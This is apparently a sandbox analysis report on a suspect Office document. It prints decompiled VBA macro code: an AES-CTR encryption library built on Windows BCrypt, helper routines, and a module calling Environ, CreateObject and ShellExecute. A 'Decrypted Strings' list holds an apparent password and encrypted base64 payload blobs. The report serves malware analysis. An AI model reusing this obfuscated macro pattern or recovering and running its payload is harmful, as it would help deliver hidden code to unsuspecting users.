          PREFIXLEN

          UBound

          CopyMemory

          OPENSSL_MAGICLEN

          KDF_SALTLEN

          CopyMemory

          OPENSSL_MAGIC

          OPENSSL_MAGICLEN

          Replace

          Part of subcall function ToBase64Array@Module3: UBound

          Part of subcall function ToBase64Array@Module3: String$

          Part of subcall function ToBase64Array@Module3: UBound

          Part of subcall function ToBase64Array@Module3: Len

          Part of subcall function ToBase64Array@Module3: CryptBinaryToString

          Part of subcall function ToBase64Array@Module3: VarPtr

          Part of subcall function ToBase64Array@Module3: UBound

          Part of subcall function ToBase64Array@Module3: CRYPT_STRING_BASE64

          Part of subcall function ToBase64Array@Module3: StrPtr

          Part of subcall function ToBase64Array@Module3: Left$

          vbCrLf

          vbNullString

          LineInstructionMeta Information
          112

          Public Function AesEncryptString(sText as String, optional Password as Variant) as String

          113

          Const PREFIXLEN as Long = OPENSSL_MAGICLEN + KDF_SALTLEN

          OPENSSL_MAGICLEN

          KDF_SALTLEN

          114

          Dim baData() as Byte

          115

          Dim baPass() as Byte

          116

          Dim baSalt() as Byte

          117

          Dim baKey() as Byte

          118

          Dim sError as String

          120

          baData = ToUtf8Array(sText)

          121

          baPass = vbNullString

          vbNullString

          122

          baSalt = vbNullString

          vbNullString

          123

          If Not IsArray(Password) Then

          IsArray

          124

          If Not IsMissing(Password) Then

          IsMissing

          125

          baPass = ToUtf8Array(Password & vbNullString)

          vbNullString

          126

          Endif

          127

          Redim baSalt(0 To KDF_SALTLEN - 1)

          KDF_SALTLEN

          128

          Call RtlGenRandom(baSalt(0), KDF_SALTLEN)

          RtlGenRandom

          KDF_SALTLEN

          129

          Else

          130

          baKey = Password

          131

          Endif

          132

          If Not AesCryptArray(baData, baPass, baSalt, baKey, Error := sError) Then

          133

          Err.Raise vbObjectError, , sError

          Raise

          vbObjectError

          134

          Endif

          135

          If Not IsArray(Password) Then

          IsArray

          136

          Redim Preserve baData(0 To UBound(baData) + PREFIXLEN)

          UBound

          PREFIXLEN

          137

          If UBound(baData) >= PREFIXLEN Then

          UBound

          PREFIXLEN

          138

          Call CopyMemory(baData(PREFIXLEN), baData(0), UBound(baData) + 1 - PREFIXLEN)

          CopyMemory

          PREFIXLEN

          UBound

          139

          Endif

          140

          Call CopyMemory(baData(OPENSSL_MAGICLEN), baSalt(0), KDF_SALTLEN)

          CopyMemory

          OPENSSL_MAGICLEN

          KDF_SALTLEN

          141

          Call CopyMemory(baData(0), ByVal OPENSSL_MAGIC, OPENSSL_MAGICLEN)

          CopyMemory

          OPENSSL_MAGIC

          OPENSSL_MAGICLEN

          142

          Endif

          143

          AesEncryptString = Replace(ToBase64Array(baData), vbCrLf, vbNullString)

          Replace

          vbCrLf

          vbNullString

          144

          End Function

          APIsMeta Information

          OPENSSL_MAGICLEN

          KDF_SALTLEN

          Part of subcall function FromBase64Array@Module3: Len

          Part of subcall function FromBase64Array@Module3: CryptStringToBinary

          Part of subcall function FromBase64Array@Module3: StrPtr

          Part of subcall function FromBase64Array@Module3: Len

          Part of subcall function FromBase64Array@Module3: CRYPT_STRING_BASE64

          Part of subcall function FromBase64Array@Module3: VarPtr

          Part of subcall function FromBase64Array@Module3: vbNullString

          vbNullString

          vbNullString

          IsArray

          IsMissing

          Part of subcall function ToUtf8Array@Module3: WideCharToMultiByte

          Part of subcall function ToUtf8Array@Module3: CP_UTF8

          Part of subcall function ToUtf8Array@Module3: StrPtr

          Part of subcall function ToUtf8Array@Module3: Len

          Part of subcall function ToUtf8Array@Module3: WideCharToMultiByte

          Part of subcall function ToUtf8Array@Module3: CP_UTF8

          Part of subcall function ToUtf8Array@Module3: StrPtr

          Part of subcall function ToUtf8Array@Module3: Len

          Part of subcall function ToUtf8Array@Module3: vbNullString

          vbNullString

          UBound

          PREFIXLEN

          String$

          OPENSSL_MAGICLEN

          CopyMemory

          OPENSSL_MAGICLEN

          OPENSSL_MAGIC

          KDF_SALTLEN

          CopyMemory

          OPENSSL_MAGICLEN

          KDF_SALTLEN

          UBound

          PREFIXLEN

          CopyMemory

          PREFIXLEN

          UBound

          UBound

          PREFIXLEN

          vbNullString

          Part of subcall function AesCryptArray@Module3: IsArray

          Part of subcall function AesCryptArray@Module3: IsMissing

          Part of subcall function AesCryptArray@Module3: vbNullString

          Part of subcall function AesCryptArray@Module3: IsArray

          Part of subcall function AesCryptArray@Module3: vbNullString

          Part of subcall function AesCryptArray@Module3: IsMissing

          Part of subcall function AesCryptArray@Module3: IsArray

          Part of subcall function AesCryptArray@Module3: vbNullString

          Part of subcall function AesCryptArray@Module3: IsArray

          Part of subcall function AesCryptArray@Module3: AES_KEYLEN

          Part of subcall function AesCryptArray@Module3: LastError

          Part of subcall function AesCryptArray@Module3: LastError

          Part of subcall function AesCryptArray@Module3: IsArray

          Part of subcall function AesCryptArray@Module3: UBound

          Part of subcall function AesCryptArray@Module3: VarPtr

          Part of subcall function AesCryptArray@Module3: VarPtr

          Part of subcall function AesCryptArray@Module3: VarPtr

          Part of subcall function AesCryptArray@Module3: VT_BYREF

          Part of subcall function AesCryptArray@Module3: CopyMemory

          Part of subcall function AesCryptArray@Module3: UBound

          Part of subcall function AesCryptArray@Module3: Array

          Part of subcall function AesCryptArray@Module3: Number

          Part of subcall function AesCryptArray@Module3: Err

          Part of subcall function AesCryptArray@Module3: Source

          Part of subcall function AesCryptArray@Module3: Description

          Part of subcall function AesCryptArray@Module3: Raise

          Raise

          vbObjectError

          Part of subcall function FromUtf8Array@Module3: UBound

          Part of subcall function FromUtf8Array@Module3: String$

          Part of subcall function FromUtf8Array@Module3: UBound

          Part of subcall function FromUtf8Array@Module3: MultiByteToWideChar

          Part of subcall function FromUtf8Array@Module3: CP_UTF8

          Part of subcall function FromUtf8Array@Module3: UBound

          Part of subcall function FromUtf8Array@Module3: StrPtr

          Part of subcall function FromUtf8Array@Module3: Len

          Part of subcall function FromUtf8Array@Module3: Left$

          LineInstructionMeta Information
          147

          Public Function AesDecryptString(sEncr as String, optional Password as Variant) as String

          148

          Const PREFIXLEN as Long = OPENSSL_MAGICLEN + KDF_SALTLEN

          OPENSSL_MAGICLEN

          KDF_SALTLEN

          149

          Dim baData() as Byte

          150

          Dim baPass() as Byte

          151

          Dim baSalt() as Byte

          152

          Dim baKey() as Byte

          153

          Dim sMagic as String

          154

          Dim sError as String

          156

          baData = FromBase64Array(sEncr)

          157

          baPass = vbNullString

          vbNullString

          158

          baSalt = vbNullString

          vbNullString

          159

          If Not IsArray(Password) Then

          IsArray

          160

          If Not IsMissing(Password) Then

          IsMissing

          161

          baPass = ToUtf8Array(Password & vbNullString)

          vbNullString

          162

          Endif

          163

          If UBound(baData) >= PREFIXLEN - 1 Then

          UBound

          PREFIXLEN

          164

          sMagic = String$(OPENSSL_MAGICLEN, 0)

          String$

          OPENSSL_MAGICLEN

          165

          Call CopyMemory(ByVal sMagic, baData(0), OPENSSL_MAGICLEN)

          CopyMemory

          OPENSSL_MAGICLEN

          166

          If sMagic = OPENSSL_MAGIC Then

          OPENSSL_MAGIC

          167

          Redim baSalt(0 To KDF_SALTLEN - 1)

          KDF_SALTLEN

          168

          Call CopyMemory(baSalt(0), baData(OPENSSL_MAGICLEN), KDF_SALTLEN)

          CopyMemory

          OPENSSL_MAGICLEN

          KDF_SALTLEN

          169

          If UBound(baData) >= PREFIXLEN Then

          UBound

          PREFIXLEN

          170

          Call CopyMemory(baData(0), baData(PREFIXLEN), UBound(baData) + 1 - PREFIXLEN)

          CopyMemory

          PREFIXLEN

          UBound

          171

          Redim Preserve baData(0 To UBound(baData) - PREFIXLEN)

          UBound

          PREFIXLEN

          172

          Else

          173

          baData = vbNullString

          vbNullString

          174

          Endif

          175

          Endif

          176

          Endif

          177

          Else

          178

          baKey = Password

          179

          Endif

          180

          If Not AesCryptArray(baData, baPass, baSalt, baKey, Error := sError) Then

          181

          Err.Raise vbObjectError, , sError

          Raise

          vbObjectError

          182

          Endif

          183

          AesDecryptString = FromUtf8Array(baData)

          184

          End Function

          APIsMeta Information

          Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptCloseAlgorithmProvider

          Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptDestroyHash

          Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptCloseAlgorithmProvider

          Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptDestroyKey

          Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptCloseAlgorithmProvider

          m_uChunkedCtx

          vbNullString

          IsArray

          AES_KEYLEN

          Part of subcall function pvCryptoAesCtrInit@Module3: vbNullString

          Part of subcall function pvCryptoAesCtrInit@Module3: vbNullString

          Part of subcall function pvCryptoAesCtrInit@Module3: AES_IVLEN

          Part of subcall function pvCryptoAesCtrInit@Module3: UBound

          Part of subcall function pvCryptoAesCtrInit@Module3: BCryptOpenAlgorithmProvider

          Part of subcall function pvCryptoAesCtrInit@Module3: StrPtr

          Part of subcall function pvCryptoAesCtrInit@Module3: KDF_HASH

          Part of subcall function pvCryptoAesCtrInit@Module3: MS_PRIMITIVE_PROVIDER

          Part of subcall function pvCryptoAesCtrInit@Module3: BCRYPT_ALG_HANDLE_HMAC_FLAG

          Part of subcall function pvCryptoAesCtrInit@Module3: BCryptDeriveKeyPBKDF2

          Part of subcall function pvCryptoAesCtrInit@Module3: pvArrayPtr

          Part of subcall function pvCryptoAesCtrInit@Module3: pvArraySize

          Part of subcall function pvCryptoAesCtrInit@Module3: KDF_ITER

          Part of subcall function pvCryptoAesCtrInit@Module3: UBound

          Part of subcall function pvCryptoAesCtrInit@Module3: BCryptOpenAlgorithmProvider

          Part of subcall function pvCryptoAesCtrInit@Module3: StrPtr

          Part of subcall function pvCryptoAesCtrInit@Module3: MS_PRIMITIVE_PROVIDER

          Part of subcall function pvCryptoAesCtrInit@Module3: BCryptGetProperty

          Part of subcall function pvCryptoAesCtrInit@Module3: StrPtr

          Part of subcall function pvCryptoAesCtrInit@Module3: BCryptSetProperty

          Part of subcall function pvCryptoAesCtrInit@Module3: StrPtr

          Part of subcall function pvCryptoAesCtrInit@Module3: BCryptGenerateSymmetricKey

          Part of subcall function pvCryptoAesCtrInit@Module3: CopyMemory

          Part of subcall function pvCryptoAesCtrInit@Module3: AES_IVLEN

          Part of subcall function pvCryptoAesCtrInit@Module3: BCryptOpenAlgorithmProvider

          Part of subcall function pvCryptoAesCtrInit@Module3: StrPtr

          Part of subcall function pvCryptoAesCtrInit@Module3: HMAC_HASH

          Part of subcall function pvCryptoAesCtrInit@Module3: MS_PRIMITIVE_PROVIDER

          Part of subcall function pvCryptoAesCtrInit@Module3: BCRYPT_ALG_HANDLE_HMAC_FLAG

          Part of subcall function pvCryptoAesCtrInit@Module3: BCryptGetProperty

          Part of subcall function pvCryptoAesCtrInit@Module3: StrPtr

          Part of subcall function pvCryptoAesCtrInit@Module3: BCryptCreateHash

          Part of subcall function pvCryptoAesCtrInit@Module3: AES_IVLEN

          Part of subcall function pvCryptoAesCtrInit@Module3: LastError

          Part of subcall function pvCryptoAesCtrInit@Module3: LastError

          Part of subcall function pvCryptoAesCtrInit@Module3: ERR_UNSUPPORTED_ENCR

          m_uChunkedCtx

          LineInstructionMeta Information
          266

          Public Function AesChunkedInit(optional key as Variant, optional ByVal KeyLen as Long) as Boolean

          267

          Dim baEmpty() as Byte

          268

          Dim baKey() as Byte

          270

          pvCryptoAesCtrTerminate m_uChunkedCtx

          m_uChunkedCtx

          271

          baEmpty = vbNullString

          vbNullString

          272

          If IsArray(key) Then

          IsArray

          273

          baKey = key

          274

          Endif

          275

          If KeyLen <= 0 Then

          276

          KeyLen = AES_KEYLEN

          AES_KEYLEN

          277

          Endif

          278

          AesChunkedInit = pvCryptoAesCtrInit(m_uChunkedCtx, baEmpty, baEmpty, baKey, KeyLen)

          m_uChunkedCtx

          279

          End Function

          APIsMeta Information

          pvArraySize

          BCryptHashData

          pvArrayPtr

          AES_BLOCK_SIZE

          AES_BLOCK_SIZE

          UBound

          AES_BLOCK_SIZE

          CopyMemory

          AES_BLOCK_SIZE

          Part of subcall function pvInc@Module3: htonl

          Part of subcall function pvInc@Module3: htonl

          Part of subcall function pvInc@Module3: htonl

          Part of subcall function pvInc@Module3: htonl

          Part of subcall function pvInc@Module3: htonl

          Part of subcall function pvInc@Module3: htonl

          Part of subcall function pvInc@Module3: htonl

          Part of subcall function pvInc@Module3: htonl

          BCryptEncrypt

          BCryptHashData

          pvArrayPtr

          LastError

          Part of subcall function GetSystemMessage@Module3: Space$

          Part of subcall function GetSystemMessage@Module3: FormatMessage

          Part of subcall function GetSystemMessage@Module3: FORMAT_MESSAGE_FROM_SYSTEM

          Part of subcall function GetSystemMessage@Module3: FORMAT_MESSAGE_IGNORE_INSERTS

          Part of subcall function GetSystemMessage@Module3: Len

          Part of subcall function GetSystemMessage@Module3: Mid$

          Part of subcall function GetSystemMessage@Module3: vbCrLf

          Part of subcall function GetSystemMessage@Module3: Left$

          Part of subcall function GetSystemMessage@Module3: Hex

          LineInstructionMeta Information
          395

          Private Function pvCryptoAesCtrCrypt(uCtx as UcsCryptoContextType, baData() as Byte, optional ByVal Offset as Long, optional ByVal Size as Long = - 1, optional ByVal HashBefore as Boolean, optional ByVal HashAfter as Boolean) as Boolean

          402

          Dim lIdx as Long

          403

          Dim lJdx as Long

          404

          Dim lPadSize as Long

          405

          Dim hResult as Long

          407

          With uCtx

          408

          If Size < 0 Then

          409

          Size = pvArraySize(baData) - Offset

          pvArraySize

          410

          Endif

          411

          If HashBefore Then

          412

          hResult = BCryptHashData(. hHmacHash, ByVal pvArrayPtr(baData, Offset), Size, 0)

          BCryptHashData

          pvArrayPtr

          413

          If hResult < 0 Then

          414

          Goto QH

          415

          Endif

          416

          Endif

          418

          For lIdx = Offset To Offset + Size - 1

          419

          If (. EncrPos And (AES_BLOCK_SIZE - 1)) = 0 Then

          AES_BLOCK_SIZE

          420

          Exit For

          421

          Endif

          422

          baData(lIdx) = baData(lIdx) Xor . EncrData(. EncrPos)

          423

          . EncrPos = . EncrPos + 1

          424

          Next

          425

          If lIdx < Offset + Size Then

          427

          lPadSize = (Offset + Size - lIdx + AES_BLOCK_SIZE - 1) And - AES_BLOCK_SIZE

          AES_BLOCK_SIZE

          428

          If UBound(. EncrData) + 1 < lPadSize Then

          UBound

          429

          ReDim .EncrData(0 To lPadSize - 1) As Byte ' BAD !

          430

          Endif

          432

          For lJdx = 0 To lPadSize - 1 Step AES_BLOCK_SIZE

          AES_BLOCK_SIZE

          433

          Call CopyMemory(. EncrData(lJdx), . Nonce(0), AES_BLOCK_SIZE)

          CopyMemory

          AES_BLOCK_SIZE

          434

          If pvInc(. Nonce(3)) Then

          435

          If pvInc(. Nonce(2)) Then

          436

          If pvInc(. Nonce(1)) Then

          437

          If pvInc(. Nonce(0)) Then

          439

          Endif

          440

          Endif

          441

          Endif

          442

          Endif

          443

          Next

          AES_BLOCK_SIZE

          444

          hResult = BCryptEncrypt(. hAesKey, . EncrData(0), lPadSize, 0, 0, 0, . EncrData(0), lPadSize, lJdx, 0)

          BCryptEncrypt

          445

          If hResult < 0 Then

          446

          Goto QH

          447

          Endif

          449

          For . EncrPos = 0 To Offset + Size - lIdx - 1

          450

          baData(lIdx) = baData(lIdx) Xor . EncrData(. EncrPos)

          451

          lIdx = lIdx + 1

          452

          Next

          453

          Endif

          454

          If HashAfter Then

          455

          hResult = BCryptHashData(. hHmacHash, ByVal pvArrayPtr(baData, Offset), Size, 0)

          BCryptHashData

          pvArrayPtr

          456

          If hResult < 0 Then

          457

          Goto QH

          458

          Endif

          459

          Endif

          460

          End With

          462

          pvCryptoAesCtrCrypt = True

          463

          Exit Function

          463

          QH:

          465

          uCtx.LastError = GetSystemMessage(hResult)

          LastError

          466

          End Function

          APIsMeta Information

          hAesAlg

          LastError

          ERR_CHUNKED_NOT_INIT

          Part of subcall function pvCryptoAesCtrCrypt@Module3: pvArraySize

          Part of subcall function pvCryptoAesCtrCrypt@Module3: BCryptHashData

          Part of subcall function pvCryptoAesCtrCrypt@Module3: pvArrayPtr

          Part of subcall function pvCryptoAesCtrCrypt@Module3: AES_BLOCK_SIZE

          Part of subcall function pvCryptoAesCtrCrypt@Module3: AES_BLOCK_SIZE

          Part of subcall function pvCryptoAesCtrCrypt@Module3: UBound

          Part of subcall function pvCryptoAesCtrCrypt@Module3: AES_BLOCK_SIZE

          Part of subcall function pvCryptoAesCtrCrypt@Module3: CopyMemory

          Part of subcall function pvCryptoAesCtrCrypt@Module3: AES_BLOCK_SIZE

          Part of subcall function pvCryptoAesCtrCrypt@Module3: BCryptEncrypt

          Part of subcall function pvCryptoAesCtrCrypt@Module3: BCryptHashData

          Part of subcall function pvCryptoAesCtrCrypt@Module3: pvArrayPtr

          Part of subcall function pvCryptoAesCtrCrypt@Module3: LastError

          Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptCloseAlgorithmProvider

          Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptDestroyHash

          Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptCloseAlgorithmProvider

          Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptDestroyKey

          Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptCloseAlgorithmProvider

          LineInstructionMeta Information
          281

          Public Function AesChunkedCryptArray(baInput() as Byte, baOutput() as Byte, optional ByVal Final as Boolean = True) as Boolean

          282

          If m_uChunkedCtx.hAesAlg = 0 Then

          hAesAlg

          283

          m_uChunkedCtx.LastError = ERR_CHUNKED_NOT_INIT

          LastError

          ERR_CHUNKED_NOT_INIT

          284

          Exit Function

          285

          Endif

          286

          baOutput = baInput

          287

          AesChunkedCryptArray = pvCryptoAesCtrCrypt(m_uChunkedCtx, baOutput)

          288

          If Final Then

          289

          pvCryptoAesCtrTerminate m_uChunkedCtx

          290

          Endif

          291

          End Function

          APIsMeta Information

          UBound

          String$

          UBound

          Len

          CryptBinaryToString

          VarPtr

          UBound

          CRYPT_STRING_BASE64

          StrPtr

          Left$

          LineInstructionMeta Information
          514

          Public Function ToBase64Array(baData() as Byte) as String

          515

          Const CRYPT_STRING_BASE64 as Long = 1

          516

          Dim lSize as Long

          518

          If UBound(baData) >= 0 Then

          UBound

          519

          ToBase64Array = String$(2 * UBound(baData) + 6, 0)

          String$

          UBound

          520

          lSize = Len(ToBase64Array) + 1

          Len

          521

          Call CryptBinaryToString(VarPtr(baData(0)), UBound(baData) + 1, CRYPT_STRING_BASE64, StrPtr(ToBase64Array), lSize)

          CryptBinaryToString

          VarPtr

          UBound

          CRYPT_STRING_BASE64

          StrPtr

          522

          ToBase64Array = Left$(ToBase64Array, lSize)

          Left$

          523

          Endif

          524

          End Function

          APIsMeta Information

          WideCharToMultiByte

          CP_UTF8

          StrPtr

          Len

          WideCharToMultiByte

          CP_UTF8

          StrPtr

          Len

          vbNullString

          LineInstructionMeta Information
          542

          Public Function ToUtf8Array(sText as String) as Byte()

          543

          Const CP_UTF8 as Long = 65001

          544

          Dim baRetVal() as Byte

          545

          Dim lSize as Long

          547

          lSize = WideCharToMultiByte(CP_UTF8, 0, StrPtr(sText), Len(sText), ByVal 0, 0, 0, 0)

          WideCharToMultiByte

          CP_UTF8

          StrPtr

          Len

          548

          If lSize > 0 Then

          549

          Redim baRetVal(0 To lSize - 1)

          550

          Call WideCharToMultiByte(CP_UTF8, 0, StrPtr(sText), Len(sText), baRetVal(0), lSize, 0, 0)

          WideCharToMultiByte

          CP_UTF8

          StrPtr

          Len

          551

          Else

          552

          baRetVal = vbNullString

          vbNullString

          553

          Endif

          554

          ToUtf8Array = baRetVal

          555

          End Function

          APIsMeta Information

          Space$

          FormatMessage

          FORMAT_MESSAGE_FROM_SYSTEM

          FORMAT_MESSAGE_IGNORE_INSERTS

          Len

          Mid$

          vbCrLf

          Left$

          Hex

          LineInstructionMeta Information
          568

          Public Function GetSystemMessage(ByVal lLastDllError as Long) as String

          569

          Const FORMAT_MESSAGE_FROM_SYSTEM as Long = &H1000

          570

          Const FORMAT_MESSAGE_IGNORE_INSERTS as Long = &H200

          571

          Dim lSize as Long

          573

          GetSystemMessage = Space$(2000)

          Space$

          574

          lSize = FormatMessage(FORMAT_MESSAGE_FROM_SYSTEM Or FORMAT_MESSAGE_IGNORE_INSERTS, 0, lLastDllError, 0, GetSystemMessage, Len(GetSystemMessage), 0)

          FormatMessage

          FORMAT_MESSAGE_FROM_SYSTEM

          FORMAT_MESSAGE_IGNORE_INSERTS

          Len

          575

          If lSize > 2 Then

          576

          If Mid$(GetSystemMessage, lSize - 1, 2) = vbCrLf Then

          Mid$

          vbCrLf

          577

          lSize = lSize - 2

          578

          Endif

          579

          Endif

          580

          GetSystemMessage = Left$(GetSystemMessage, lSize) & " &H" & Hex(lLastDllError)

          Left$

          Hex

          581

          End Function

          APIsMeta Information

          UBound

          String$

          UBound

          MultiByteToWideChar

          CP_UTF8

          UBound

          StrPtr

          Len

          Left$

          LineInstructionMeta Information
          557

          Public Function FromUtf8Array(baText() as Byte) as String

          558

          Const CP_UTF8 as Long = 65001

          559

          Dim lSize as Long

          561

          If UBound(baText) >= 0 Then

          UBound

          562

          FromUtf8Array = String$(2 * (UBound(baText) + 1), 0)

          String$

          UBound

          563

          lSize = MultiByteToWideChar(CP_UTF8, 0, baText(0), UBound(baText) + 1, StrPtr(FromUtf8Array), Len(FromUtf8Array))

          MultiByteToWideChar

          CP_UTF8

          UBound

          StrPtr

          Len

          564

          FromUtf8Array = Left$(FromUtf8Array, lSize)

          Left$

          565

          Endif

          566

          End Function

          APIsMeta Information

          Len

          CryptStringToBinary

          StrPtr

          Len

          CRYPT_STRING_BASE64

          VarPtr

          vbNullString

          LineInstructionMeta Information
          526

          Public Function FromBase64Array(sText as String) as Byte()

          527

          Const CRYPT_STRING_BASE64 as Long = 1

          528

          Dim lSize as Long

          529

          Dim baOutput() as Byte

          531

          lSize = Len(sText) + 1

          Len

          532

          Redim baOutput(0 To lSize - 1)

          533

          Call CryptStringToBinary(StrPtr(sText), Len(sText), CRYPT_STRING_BASE64, VarPtr(baOutput(0)), lSize, 0, 0)

          CryptStringToBinary

          StrPtr

          Len

          CRYPT_STRING_BASE64

          VarPtr

          534

          If lSize > 0 Then

          535

          Redim Preserve baOutput(0 To lSize - 1)

          536

          FromBase64Array = baOutput

          537

          Else

          538

          FromBase64Array = vbNullString

          vbNullString

          539

          Endif

          540

          End Function

          APIsMeta Information

          CopyMemory

          ArrPtr

          PTR_SIZE

          UBound

          LBound

          VarPtr

          LBound

          LineInstructionMeta Information
          489

          Private Property Get pvArrayPtr(baArray() as Byte, optional ByVal Index as Long) as LongPtr

          490

          Dim lPtr as LongPtr

          493

          Call CopyMemory(lPtr, ByVal ArrPtr(baArray), PTR_SIZE)

          CopyMemory

          ArrPtr

          PTR_SIZE

          494

          If lPtr <> 0 Then

          495

          If 0 <= Index And Index <= UBound(baArray) - LBound(baArray) Then

          UBound

          LBound

          496

          pvArrayPtr = VarPtr(baArray(LBound(baArray) + Index))

          VarPtr

          LBound

          497

          Endif

          498

          Endif

          499

          End Property

          APIsMeta Information

          BCryptCloseAlgorithmProvider

          BCryptDestroyHash

          BCryptCloseAlgorithmProvider

          BCryptDestroyKey

          BCryptCloseAlgorithmProvider

          LineInstructionMeta Information
          370

          Private Sub pvCryptoAesCtrTerminate(uCtx as UcsCryptoContextType)

          371

          With uCtx

          372

          If . hPbkdf2Alg <> 0 Then

          373

          Call BCryptCloseAlgorithmProvider(. hPbkdf2Alg, 0)

          BCryptCloseAlgorithmProvider

          374

          . hPbkdf2Alg = 0

          375

          Endif

          376

          If . hHmacHash <> 0 Then

          377

          Call BCryptDestroyHash(. hHmacHash)

          BCryptDestroyHash

          378

          . hHmacHash = 0

          379

          Endif

          380

          If . hHmacAlg <> 0 Then

          381

          Call BCryptCloseAlgorithmProvider(. hHmacAlg, 0)

          BCryptCloseAlgorithmProvider

          382

          . hHmacAlg = 0

          383

          Endif

          384

          If . hAesKey <> 0 Then

          385

          Call BCryptDestroyKey(. hAesKey)

          BCryptDestroyKey

          386

          . hAesKey = 0

          387

          Endif

          388

          If . hAesAlg <> 0 Then

          389

          Call BCryptCloseAlgorithmProvider(. hAesAlg, 0)

          BCryptCloseAlgorithmProvider

          390

          . hAesAlg = 0

          391

          Endif

          392

          End With

          393

          End Sub

          APIsMeta Information

          CopyMemory

          ArrPtr

          PTR_SIZE

          UBound

          LBound

          LineInstructionMeta Information
          501

          Private Property Get pvArraySize(baArray() as Byte) as Long

          502

          Dim lPtr as LongPtr

          505

          Call CopyMemory(lPtr, ByVal ArrPtr(baArray), PTR_SIZE)

          CopyMemory

          ArrPtr

          PTR_SIZE

          506

          If lPtr <> 0 Then

          507

          pvArraySize = UBound(baArray) + 1 - LBound(baArray)

          UBound

          LBound

          508

          Endif

          509

          End Property

          APIsMeta Information

          HashLen

          BCryptFinishHash

          hHmacHash

          HashLen

          LineInstructionMeta Information
          468

          Private Function pvCryptoGetFinalHash(uCtx as UcsCryptoContextType, ByVal lSize as Long) as Byte()

          469

          Dim baResult() as Byte

          471

          Redim baResult(0 To uCtx.HashLen - 1)

          HashLen

          472

          Call BCryptFinishHash(uCtx.hHmacHash, baResult(0), uCtx.HashLen, 0)

          BCryptFinishHash

          hHmacHash

          HashLen

          473

          Redim Preserve baResult(0 To lSize - 1)

          474

          pvCryptoGetFinalHash = baResult

          475

          End Function

          APIsMeta Information

          htonl

          htonl

          LineInstructionMeta Information
          477

          Private Function pvInc(lValue as Long) as Boolean

          478

          lValue = htonl(lValue)

          htonl

          479

          If lValue = - 1 Then

          480

          lValue = 0

          482

          pvInc = True

          483

          Else

          484

          lValue = (lValue Xor &H80000000) + 1 Xor &H80000000

          485

          lValue = htonl(lValue)

          htonl

          486

          Endif

          487

          End Function

          APIsMeta Information

          LastError

          m_uChunkedCtx

          LineInstructionMeta Information
          293

          Public Function AesChunkedGetLastError() as String

          294

          AesChunkedGetLastError = m_uChunkedCtx.LastError

          LastError

          m_uChunkedCtx

          295

          End Function

          APIsMeta Information

          CopyMemory

          PTR_SIZE

          LineInstructionMeta Information
          583

          Private Function PeekPtr(ByVal lPtr as LongPtr) as LongPtr

          584

          Call CopyMemory(PeekPtr, ByVal lPtr, PTR_SIZE)

          CopyMemory

          PTR_SIZE

          585

          End Function

          Module: ViewSession

          Declaration
          LineContent
          1

          Attribute VB_Name = "ViewSession"

          2

          Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"

          3

          Attribute VB_GlobalNameSpace = False

          4

          Attribute VB_Creatable = False

          5

          Attribute VB_PredeclaredId = False

          6

          Attribute VB_Exposed = True

          7

          Attribute VB_TemplateDerived = False

          8

          Attribute VB_Customizable = False

          APIsMeta Information

          Part of subcall function AesDecryptString@Module3: OPENSSL_MAGICLEN

          Part of subcall function AesDecryptString@Module3: KDF_SALTLEN

          Part of subcall function AesDecryptString@Module3: vbNullString

          Part of subcall function AesDecryptString@Module3: vbNullString

          Part of subcall function AesDecryptString@Module3: IsArray

          Part of subcall function AesDecryptString@Module3: IsMissing

          Part of subcall function AesDecryptString@Module3: vbNullString

          Part of subcall function AesDecryptString@Module3: UBound

          Part of subcall function AesDecryptString@Module3: PREFIXLEN

          Part of subcall function AesDecryptString@Module3: String$

          Part of subcall function AesDecryptString@Module3: OPENSSL_MAGICLEN

          Part of subcall function AesDecryptString@Module3: CopyMemory

          Part of subcall function AesDecryptString@Module3: OPENSSL_MAGICLEN

          Part of subcall function AesDecryptString@Module3: OPENSSL_MAGIC

          Part of subcall function AesDecryptString@Module3: KDF_SALTLEN

          Part of subcall function AesDecryptString@Module3: CopyMemory

          Part of subcall function AesDecryptString@Module3: OPENSSL_MAGICLEN

          Part of subcall function AesDecryptString@Module3: KDF_SALTLEN

          Part of subcall function AesDecryptString@Module3: UBound

          Part of subcall function AesDecryptString@Module3: PREFIXLEN

          Part of subcall function AesDecryptString@Module3: CopyMemory

          Part of subcall function AesDecryptString@Module3: PREFIXLEN

          Part of subcall function AesDecryptString@Module3: UBound

          Part of subcall function AesDecryptString@Module3: UBound

          Part of subcall function AesDecryptString@Module3: PREFIXLEN

          Part of subcall function AesDecryptString@Module3: vbNullString

          Part of subcall function AesDecryptString@Module3: Raise

          Part of subcall function AesDecryptString@Module3: vbObjectError

          Environ

          Open

          Len

          Mid

          CreateObject

          ShellExecute

          StringsDecrypted Strings
          "Bnshekao@3123989942"
          "U2FsdGVkX1+dNqiwSTp9Sqv/0TVrzrOc76g8zk4YPSNm5OKURc2v0uIodtcsnOL6RJb3xYgUlCOFV6b6XWkTdeHQCGey7pI8qwnT5xLy/VKSKg5FmPBOCTNQUgAASA7wXsGTeAC5PbxpiVz04iBNdx"
          "bUoo21wrnWlCB0xLqmNF1uhdY1X6mPBEZyoB9M3X2e8G+2gVZC616vgx4A63rh5QJUwC+/llk0cuMyK5PZ4GPRRyjK6DAKh+NjgEfwujNBYu1K1wKhEdzX7hSmdnhxJ6QU6m3L8g4OtSwJ+B5lcYs1"
          "APaW/Bt4WwymusVnlV/9P1kTHJwZsLr2yuzrUR6QD4Z7Hy2CH1HCd78hoUhbKM2hXKsb9QZdjPI3nC+NVPgVbZTwZsSlmE2sXyeYXZb0/11tIK0AnJLNPd8KLtpNfioVRINA601YuFNqSi8J+vAjFq"
          "ptgioL11dGXpMe3Y1hFXWiCXvUpWkV1X58aK4AAFqY4itc1XMpNkjKiGNdP6QdVCrQ/fFg/ni38thsinsexqtAkb6immNECdsvgpKh36pjarHIAl1fya1xofovnGuT97OLiJH8wVysHeM9YKKZPgZF"
